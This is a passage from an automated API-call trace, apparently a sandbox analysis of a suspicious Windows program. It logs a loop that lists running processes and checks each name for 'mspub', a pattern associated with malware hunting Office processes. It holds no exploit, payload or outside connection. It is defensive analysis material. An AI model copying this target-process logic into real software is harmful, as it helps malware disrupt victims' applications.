lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.834] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579608 [0097.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3579608, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0097.834] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0097.834] StrStrIA (lpFirst="omnipos.exe", lpSrch="mspub") returned 0x0 [0097.834] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0097.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.836] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579770 [0097.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3579770, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0097.836] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0097.836] StrStrIA (lpFirst="spcwin.exe", lpSrch="mspub") returned 0x0 [0097.836] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0097.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0097.837] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x357a8d8 [0097.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x357a8d8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0097.837] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0097.837] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="mspub") returned 0x0 [0097.837] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0097.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.838] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3579788 [0097.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3579788, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0097.838] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0097.838] StrStrIA (lpFirst="utg2.exe", lpSrch="mspub") returned 0x0 [0097.838] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0097.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.839] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579b90 [0097.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3579b90, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0097.840] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0097.840] StrStrIA (lpFirst="saying.exe", lpSrch="mspub") returned 0x0 [0097.840] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0097.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.841] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3579a10 [0097.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3579a10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0097.841] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0097.841] StrStrIA (lpFirst="ripe.exe", lpSrch="mspub") returned 0x0 [0097.841] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0097.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.842] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579908 [0097.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3579908, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0097.842] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0097.842] StrStrIA (lpFirst="acoustic.exe", lpSrch="mspub") returned 0x0 [0097.842] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0097.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.843] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35798a8 [0097.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x35798a8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0097.843] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0097.843] StrStrIA (lpFirst="mail.exe", lpSrch="mspub") returned 0x0 [0097.843] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0097.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.845] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579920 [0097.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3579920, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0097.845] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0097.845] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="mspub") returned 0x0 [0097.845] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.846] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579aa0 [0097.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579aa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.846] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.846] StrStrIA (lpFirst="svchost.exe", lpSrch="mspub") returned 0x0 [0097.846] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0097.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.848] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579a58 [0097.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3579a58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.848] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0097.848] StrStrIA (lpFirst="dllhost.exe", lpSrch="mspub") returned 0x0 [0097.848] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.849] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3579b48 [0097.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3579b48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0097.849] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0097.849] StrStrIA (lpFirst="taskhostw.exe", lpSrch="mspub") returned 0x0 [0097.849] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0097.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.850] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3579b60 [0097.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3579b60, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0097.850] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0097.850] StrStrIA (lpFirst="UsoClient.exe", lpSrch="mspub") returned 0x0 [0097.850] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.851] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3579950 [0097.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3579950, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0097.852] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0097.852] StrStrIA (lpFirst="taskhostw.exe", lpSrch="mspub") returned 0x0 [0097.852] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0097.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0097.853] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x357a918 [0097.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x357a918, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0097.853] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0097.853] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="mspub") returned 0x0 [0097.853] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0097.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0097.854] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357a978 [0097.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x357a978, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0097.854] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0097.854] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="mspub") returned 0x0 [0097.854] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0097.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0097.855] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356b578 [0097.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356b578, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0097.855] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0097.856] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="mspub") returned 0x0 [0097.856] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0097.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.857] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579b78 [0097.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3579b78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.857] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0097.857] StrStrIA (lpFirst="conhost.exe", lpSrch="mspub") returned 0x0 [0097.857] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0097.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.858] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35798c0 [0097.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x35798c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.858] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0097.858] StrStrIA (lpFirst="conhost.exe", lpSrch="mspub") returned 0x0 [0097.858] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0097.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.859] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35798d8 [0097.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x35798d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0097.859] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0097.859] StrStrIA (lpFirst="rxodge.exe", lpSrch="mspub") returned 0x0 [0097.859] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0097.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.861] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579a70 [0097.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3579a70, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0097.861] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0097.861] StrStrIA (lpFirst="sppsvc.exe", lpSrch="mspub") returned 0x0 [0097.861] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0097.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.935] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357aa38 [0097.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x357aa38, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0097.935] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0097.935] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="mspub") returned 0x0 [0097.935] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0097.936] CloseHandle (hObject=0x358) returned 1 [0097.936] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0097.957] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0097.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0097.958] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357aa98 [0097.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x357aa98, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0097.958] 